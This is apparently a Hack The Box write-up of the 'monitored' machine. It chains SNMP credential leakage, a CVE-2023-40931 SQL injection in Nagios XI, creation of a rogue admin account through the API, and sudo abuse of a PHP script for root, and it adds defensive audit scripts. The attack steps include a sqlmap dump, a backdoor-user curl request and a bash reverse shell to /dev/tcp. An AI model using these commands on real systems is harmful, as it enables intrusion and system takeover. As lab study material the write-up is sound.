HTB: monitored Writeup


Machine Information

Attribute     Details
Name          monitored
OS            Linux
Difficulty    Medium
Points        N/A
Release Date  N/A
IP Address    10.129.10.194
Author        D3vnomi

Machine Rating

⭐⭐⭐⭐☆ (7.0/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐☆☆
  • Real-world: ⭐⭐⭐⭐☆
  • CVE: ⭐⭐⭐☆☆
  • CTF-like: ⭐⭐⭐☆☆

Summary

monitored is a Medium-difficulty Linux machine. The attack chain leverages CVE-2023-40931. The exploitation path consists of initial enumeration and service discovery, an initial foothold through the identified vulnerability, credential extraction for user access, and finally privilege escalation to root.

TL;DR: Enumeration → Foothold → User credentials → Privilege escalation → Root.


Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.10.194
nmap -sU -p 161 10.129.10.194

Results:

22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp open http Apache httpd 2.4.56
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
443/tcp open https Apache httpd 2.4.56 (SSL/TLS)
5667/tcp open tcpwrapped
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server

Service Enumeration

Hostnames: monitored.htb, nagios.monitored.htb

echo "10.129.10.194 monitored.htb nagios.monitored.htb" >> /etc/hosts

Discovered Services:

  • Nagios XI (Web application on HTTPS port 443)
  • OpenLDAP directory service on port 389
  • Apache web server on ports 80 and 443
  • SNMP service on UDP port 161
  • Unknown service on port 5667

SNMP Enumeration

snmpbulkwalk -c public -v2c 10.129.10.194 . | grep -i bash

Results: Discovered process command line containing credentials:

"sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB"

Extracted credentials: svc:XjH7VCehowpR1xZB

Directory Enumeration

gobuster dir -u https://nagios.monitored.htb -w /usr/share/wordlists/dirb/common.txt -k
feroxbuster -u https://nagios.monitored.htb -w /usr/share/wordlists/dirb/common.txt -k

Identified Endpoints:

  • /nagiosxi/ — Nagios XI administrative interface
  • /nagios/ — Nagios core interface
  • Various API endpoints under /nagiosxi/api/v1/

Vulnerability Assessment

Identified Vulnerabilities:

  • CVE-2023-40931 — SQL injection in Nagios XI through the id parameter of banner_message-ajaxhelper.php (the banner acknowledgment helper)

Initial Foothold

SNMP Credential Extraction

The SNMP service with the public community string revealed process information containing hardcoded credentials. These credentials were used to authenticate to Nagios services.

snmpbulkwalk -c public -v2c monitored.htb . | grep "sudo\|bash"

This revealed: sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB
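As an added example (not from the original writeup), the Python script below parses the HOST-RESOURCES-MIB process table that the snmpbulkwalk queries in the SNMP Enumeration and SNMP Credential Extraction sections return, and flags command lines that expose credential-looking arguments; an administrator can run it over a walk of their own host to find what a read-only community string would disclose. The sample walk output is constructed, the placeholder secrets are not real values, and the detection heuristics are assumptions.

```python
import re

# Constructed sample of snmpbulkwalk output for the HOST-RESOURCES-MIB process
# table (hrSWRunName/hrSWRunParameters). Not a capture from the machine; the
# credential values are placeholders.
SAMPLE_WALK = """\
HOST-RESOURCES-MIB::hrSWRunName.1 = STRING: "systemd"
HOST-RESOURCES-MIB::hrSWRunName.812 = STRING: "sudo"
HOST-RESOURCES-MIB::hrSWRunName.990 = STRING: "sshd"
HOST-RESOURCES-MIB::hrSWRunName.1201 = STRING: "mysql"
HOST-RESOURCES-MIB::hrSWRunParameters.1 = ""
HOST-RESOURCES-MIB::hrSWRunParameters.812 = STRING: "-u svc /bin/bash -c /opt/scripts/check_host.sh svc Qw7tPLACEHOLDER9z"
HOST-RESOURCES-MIB::hrSWRunParameters.990 = STRING: "-D"
HOST-RESOURCES-MIB::hrSWRunParameters.1201 = STRING: "-u nagios --password=hunter2 nagiosxi"
"""

LINE_RE = re.compile(r'^HOST-RESOURCES-MIB::(hrSWRunName|hrSWRunParameters)\.(\d+) = (?:STRING: )?"(.*)"$')
# Arguments that name a secret explicitly, e.g. --password=..., token=..., apikey=...
FLAG_RE = re.compile(r"(?i)^-{0,2}(?:pass(?:word|wd)?|pwd|secret|token|api[-_]?key)=")

def parse_process_table(walk_text):
    """Join hrSWRunName and hrSWRunParameters rows by PID -> {pid: (name, args)}."""
    names, params = {}, {}
    for line in walk_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            column, pid, value = m.group(1), int(m.group(2)), m.group(3)
            (names if column == "hrSWRunName" else params)[pid] = value
    return {pid: (name, params.get(pid, "")) for pid, name in names.items()}

def looks_like_secret(token):
    """Heuristic (an assumption): long mixed-case alphanumeric token that is not a path or flag."""
    if len(token) < 12 or token[0] in "/-" or not token.isalnum():
        return False
    return (any(c.islower() for c in token) and any(c.isupper() for c in token)
            and any(c.isdigit() for c in token))

def find_exposed_secrets(walk_text):
    """(pid, process name, suspicious argument) for every command line that leaks a credential."""
    hits = []
    for pid, (name, args) in sorted(parse_process_table(walk_text).items()):
        hits.extend((pid, name, tok) for tok in args.split()
                    if FLAG_RE.match(tok) or looks_like_secret(tok))
    return hits

if __name__ == "__main__":
    for pid, name, tok in find_exposed_secrets(SAMPLE_WALK):
        print(f"pid {pid} ({name}) exposes {tok!r} on its command line")
```

Any hit is a process whose secret should move out of argv (into a root-only file or environment the wrapper reads), and the snmpd view should exclude the hrSWRun subtree for the public community.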

Nagios XI Authentication

A direct login to /nagiosxi/ with the extracted credentials svc:XjH7VCehowpR1xZB failed, so the Nagios XI API authentication endpoint was used instead:

curl -XPOST -k 'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate' \
-d 'username=svc&password=XjH7VCehowpR1xZB&valid_min=5'

Response:

{
"auth_token": "0156cce63709810ed0bb9f58a6e88de65bef382e"
}

CVE-2023-40931 SQL Injection Exploitation

Exploited SQL injection vulnerability in the banner acknowledgment endpoint:

sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=0156cce63709810ed0bb9f58a6e88de65bef382e" \
-k --batch --dbs

Successfully dumped the nagiosxi database and extracted the admin API key:

IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL

Admin User Creation via API

Used the extracted API key to create a new admin user account:

curl -XPOST "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" \
-d "username=mrsudo&password=mrsudo&name=mrsudo&email=mrsudo@localhost&auth_level=admin" -k

Successfully created admin account with credentials mrsudo:mrsudo


User Compromise

Initial Access Credentials

Primary Credentials Discovered:

  • Username: svc
  • Password: XjH7VCehowpR1xZB
  • Source: SNMP process enumeration

These credentials were extracted from SNMP process information and provided initial access to the Nagios system via the API endpoint. Standard web login attempts were unsuccessful, but API authentication worked.

SSH Access

ssh svc@monitored.htb
# Password: XjH7VCehowpR1xZB

Successfully gained shell access as user svc.

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>


Privilege Escalation

Sudo Privileges Enumeration

sudo -l

Output:

User svc may run the following commands as root:
(root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/eventhandlers/handle_host_state_change.sh *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/eventhandlers/handle_service_state_change.sh *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/components/xicore.sh *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/components/manage_logrotate.php *
(root) NOPASSWD: several other nagiosxi scripts

Exploitation: PHP Script Parameter Injection

The autodiscover_new.php script accepts a --script parameter whose value is executed without sanitization:

sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --script="$TF"

Here $TF is a shell variable holding an arbitrary command (quoted so the shell passes it as a single argument); because the script runs via sudo, the command executes as root.

Exploitation steps:

# Create a simple reverse shell or command execution
TF='bash -i >& /dev/tcp/10.10.14.8/4444 0>&1'
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --script="$TF"

Alternatively, to confirm that commands run as root without a reverse shell:

sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --script='id'

This command executes with root privileges, allowing for full system compromise.
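As an added example, not part of the writeup, the following Python audit parses `sudo -l` output like the listing in Sudo Privileges Enumeration and rates each rule on the three properties that made the autodiscover_new.php rule exploitable: NOPASSWD, a trailing `*` (the caller chooses the arguments the script receives), and an interpreter rather than a fixed binary as the permitted command. The sample listing is constructed from the entries quoted above and the risk labels are an assumption.

```python
import re

# Constructed `sudo -l` listing modelled on the entries quoted above
# (sample input for this example, not a capture from the machine).
SAMPLE_SUDO_L = """\
User svc may run the following commands as root:
    (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/components/xicore.sh *
    (root) /usr/bin/systemctl restart nagios
"""

# One rule line as printed by `sudo -l`: "(runas) TAG: TAG: command args".
ENTRY_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s+)*)(?P<cmd>\S.*)$")
INTERPRETERS = {"php", "python", "python3", "perl", "bash", "sh", "ruby", "node"}
ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3}

def parse_sudo_l(text):
    """Return one {'runas', 'tags', 'argv'} dict per rule; header lines are skipped."""
    entries = []
    for raw in text.splitlines():
        m = ENTRY_RE.match(raw.strip())
        if m:
            tags = [t.rstrip(":") for t in m.group("tags").split()]
            entries.append({"runas": m.group("runas"), "tags": tags, "argv": m.group("cmd").split()})
    return entries

def findings(entry):
    """Name the properties that weaken a rule."""
    argv, out = entry["argv"], []
    if "NOPASSWD" in entry["tags"]:
        out.append("nopasswd")        # no password prompt: any session as the user suffices
    if argv and argv[-1] == "*":
        out.append("wildcard-args")   # the caller chooses the arguments the script receives
    if argv and argv[0].rsplit("/", 1)[-1] in INTERPRETERS:
        out.append("interpreter")     # sudo allows an interpreter, not a fixed binary
    return out

def risk(entry):
    """Constructed rating: wildcard plus interpreter is the autodiscover_new.php pattern."""
    f = findings(entry)
    if "wildcard-args" in f:
        return "critical" if "interpreter" in f else "high"
    return "medium" if "nopasswd" in f else "low"

def audit(text):
    """Every rule with its findings and rating, highest risk first."""
    rows = [{"command": " ".join(e["argv"]), "findings": findings(e), "risk": risk(e)}
            for e in parse_sudo_l(text)]
    return sorted(rows, key=lambda r: ORDER[r["risk"]])
```

The fix for a critical row is to drop the trailing `*` (or enumerate the exact argument strings sudoers should permit) and to grant a fixed wrapper binary instead of the interpreter.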

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>


Attack Chain Summary

graph TD
A["SNMP Enumeration"] -->|Hardcoded Credentials| B["API Authentication"]
B -->|Auth Token| C["CVE-2023-40931 SQLi"]
C -->|Database Dump| D["Extract Admin API Key"]
D -->|Create Admin User| E["Nagios XI Admin Access"]
E -->|SSH Login as svc| F["User Shell"]
F -->|sudo -l| G["Identify Sudo Privs"]
G -->|Parameter Injection| H["PHP Script Execution"]
H -->|Arbitrary Commands| I["Root Access"]

Tools Used

Tool          Purpose
nmap          TCP/UDP port scanning and service fingerprinting
snmpbulkwalk  SNMP enumeration to extract process information
snmpwalk      SNMP OID enumeration and data retrieval
gobuster      HTTP directory and subdomain enumeration
feroxbuster   Recursive directory brute-forcing
curl          HTTP requests and API interaction
sqlmap        SQL injection exploitation and database dumping
ssh           Secure shell access and command execution
php           Execution of server-side scripts (sudo exploitation)

Vulnerability Reference

#  Vulnerability                        Component                                   Severity  Impact
1  CVE-2023-40931                       Nagios XI - banner_message-ajaxhelper.php   Critical  SQL Injection → Database Compromise → API Key Extraction
2  SNMP Public Community String         Network Protocol                            High      Unauthenticated process enumeration → Credential disclosure
3  Hardcoded Credentials in Processes   Configuration                               High      Plain-text credential storage in system processes
4  Insecure Sudo Configuration          Privilege Escalation                        Critical  Unvalidated parameter injection in PHP scripts
5  PHP Parameter Injection              autodiscover_new.php                        Critical  Remote code execution as root

Key Learnings

  • SNMP Enumeration is Critical: SNMP with default/public community strings can leak sensitive information including process command lines and credentials.
  • API Authentication Over Web UI: When standard web login fails, alternative authentication methods (such as REST APIs) may succeed with the same credentials.
  • SQL Injection in Nagios: CVE-2023-40931 demonstrates how parameter validation failures can lead to database compromise and extraction of administrative credentials/keys.
  • Credential Extraction Chains: Initial credentials can bootstrap privilege escalation through API access, database dumping, and additional account creation.
  • Sudo Misconfiguration: Scripts run with NOPASSWD sudo often contain unvalidated parameters that enable privilege escalation through parameter injection attacks.
  • Defense in Depth Failures: Multiple security failures (hardcoded credentials, default SNMP, unpatched SQLi, insecure sudo configuration) combined enable full system compromise.

Author

D3vnomi


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Medium #CVE-2023-40931 #SNMP #Nagios #SQLi #PrivilegeEscalation